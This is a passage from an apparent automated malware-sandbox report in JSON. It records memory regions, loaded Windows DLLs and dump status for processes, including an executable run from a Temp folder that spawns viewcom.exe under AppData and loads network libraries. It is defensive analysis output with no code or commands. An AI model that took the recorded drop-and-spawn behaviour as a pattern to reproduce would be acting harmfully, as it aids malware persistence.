"ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_936", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:01.941", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000937-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_937", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:01.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_938", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:01.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4284415, "entry_point": 4199312, "filename": "\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe", "id": "region_939", "name": "38763.exe", "norm_filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:01.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_940", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:01:01.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_941", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:01.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_942", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:01.947", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000943-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_943", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:01.948", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000944-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_944", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:01.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_945", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:01.963", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000946-addr_0x00000000001a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_946", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:01:01.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3174399, "entry_point": 2752512, "filename": "\\Windows\\System32\\locale.nls", "id": "region_947", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2752512, "timestamp": "00:01:01.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_948", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:01.964", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000949-addr_0x0000000000580000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:01.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1832910848, "type": "region", "version": 1 }, "end_va": 1833242623, "entry_point": 1833080972, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_950", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1832910848, "timestamp": "00:01:01.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_951", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:01.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_952", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:01:01.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_953", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:01:01.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_954", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:01:01.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_955", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:01:01.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_956", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:01:01.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_957", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:01:01.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_958", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:01:01.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_959", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:01:01.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 2004221952, "type": "region", "version": 1 }, "end_va": 2004807679, "entry_point": 2004238257, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_960", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 2004221952, "timestamp": "00:01:01.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_961", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:01.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_962", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:01.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_963", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:01:01.976", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000964-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_964", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:01.984", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000965-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_965", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:01.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5378047, "entry_point": 0, "filename": null, "id": "region_966", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:01.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 18415615, "entry_point": 0, "filename": null, "id": "region_967", "name": "pagefile_0x0000000000590000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5832704, "timestamp": "00:01:01.985", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000968-addr_0x00000000011f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18808832, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_968", "name": "private_0x00000000011f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18808832, "timestamp": "00:01:01.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_969", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:01:01.986", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000970-addr_0x0000000001200000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_970", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:01:01.999", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000971-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_971", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:02.000", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000972-addr_0x0000000000150000-size_0x000000000000e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1433599, "entry_point": 0, "filename": null, "id": "region_972", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:02.057", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000973-addr_0x0000000000160000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1495039, "entry_point": 0, "filename": null, "id": "region_973", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:02.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_974", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:01:02.061", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_975", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:01:02.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1868562432, "type": "region", "version": 1 }, "end_va": 1868922879, "entry_point": 1868567476, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_976", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1868562432, "timestamp": "00:01:02.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1868234752, "type": "region", "version": 1 }, "end_va": 1868558335, "entry_point": 1868239954, "filename": "\\Windows\\System32\\webio.dll", "id": "region_977", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1868234752, "timestamp": "00:01:02.278", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1976434688, "type": "region", "version": 1 }, "end_va": 1977704447, "entry_point": 1976441653, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_978", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1976434688, "timestamp": "00:01:02.287", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1998454784, "type": "region", "version": 1 }, "end_va": 1999458303, "entry_point": 1998461029, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_979", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1998454784, "timestamp": "00:01:02.302", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1977810944, "type": "region", "version": 1 }, "end_va": 1979887615, "entry_point": 1977819865, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_980", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1977810944, "timestamp": "00:01:02.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1972162559, "entry_point": 1971000714, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_981", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:01:02.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970847743, "entry_point": 1970807694, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_982", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:02.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1969487872, "type": "region", "version": 1 }, "end_va": 1969598463, "entry_point": 1969525689, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_983", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1969487872, "timestamp": "00:01:02.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 22867967, "entry_point": 19922944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_984", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19922944, "timestamp": "00:01:02.486", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000985-addr_0x0000000000170000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1560575, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:02.616", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\"", "filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "id": "proc_6", "image_name": "viewcom.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00000986-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_986", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:04.831", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000987-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_987", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:04.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_988", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:04.835", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4284415, "entry_point": 4199312, "filename": "\\Users\\ATVEYD~1\\AppData\\Local\\Temp\\38763.exe", "id": "region_989", "name": "38763.exe", "norm_filename": "c:\\users\\atveyd~1\\appdata\\local\\temp\\38763.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:04.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_990", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:01:04.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_991", "name": "apisetschema.dll", 